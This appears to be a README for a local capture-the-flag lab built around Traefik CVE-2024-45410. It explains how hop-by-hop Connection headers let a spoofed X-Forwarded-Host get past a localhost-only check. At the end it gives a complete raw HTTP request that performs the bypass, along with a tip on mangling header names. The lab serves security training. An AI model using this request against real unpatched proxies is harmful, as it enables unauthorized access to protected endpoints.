Welcome to the Shadow Corp Capture the Flag (CTF) challenge! This challenge will test your skills in identifying and exploiting vulnerabilities related to security headers and HTTP proxy behavior. Your mission is to bypass protections and uncover secrets hidden within the Shadow Corp web application.
You’ve discovered the public-facing web interface of Shadow Corp, a notorious organization involved in covert cyber espionage. Rumor has it, they’ve secured a protected endpoint that only trusted insiders can access. However, there are whispers that with the right techniques, you can trick the system into revealing this hidden endpoint and expose Shadow Corp's secrets.
Your task: access the protected endpoint and retrieve the hidden flag!
This CTF can be run locally, and you'll need to install and configure the web application.
docker compose is required to run this application curl is recommended for querying and testing endpoints.
Clone the repository and navigate to the project directory:
cd traefik-CVE-2024-45410-poc
Run the CTF
docker compose up
Your primary goal is to access the /protected endpoint and retrieve the secret flag. However, you’ll notice that direct access is blocked unless certain conditions are met. The system checks for trusted sources by validating the X-Forwarded-Host header.
The application is designed to only allow access from localhost (127.0.0.1). However, if you inspect the HTTP headers carefully, you might discover a way to "trick" the server into believing you are a trusted source. Look into HTTP proxy headers and how they can be manipulated.
Have you ever explored hop-by-hop headers? These headers are commonly used by proxies to control or modify the behavior of forwarded requests. By correctly manipulating these headers, you might be able to convince the server that you're coming from a trusted location, even if you're not.
The Connection header can be a game-changer. What if you could introduce a header that the system implicitly trusts? Explore how you might modify the request headers to include X-Forwarded-Host in a way the server might not expect.
Example Command (Non-Solution) Here’s an example of how to start experimenting with curl:
curl -i http://localhost:5000/protectedThis will show you that access is denied by default.
In some systems, certain headers are considered hop-by-hop, meaning they control the behavior of each intermediary in a chain of HTTP requests. These headers are stripped or altered by proxies. However, if you cleverly manipulate the headers and specify the right hop-by-hop header, you might find a way to bypass certain security mechanisms. Focus on how the Connection header works and how you might influence other headers that usually aren't forwarded beyond a single hop. This could help you trick the server into thinking you’re a trusted client.
Start thinking about how to tweak your request to gain access. The answer lies in how the application handles trusted host headers. Remember, manipulating headers may be the key to solving this CTF.
https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv
Some backend frameworks (e.g. Django) handle X-Forwarded-Host and X_forwarded_host in the same way. As there is no X-Forwarded-Host header present in the request, the X_forwarded_host header will be used.
GET /admin HTTP/1.1
Host: flask.localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Forwarded_Host: 127.0.0.1
Connection: close, X-forwarded-Host
Content-Length: 0
Tip
It's important to mangle with the HTTP header names. Capitalization and replacing - with _.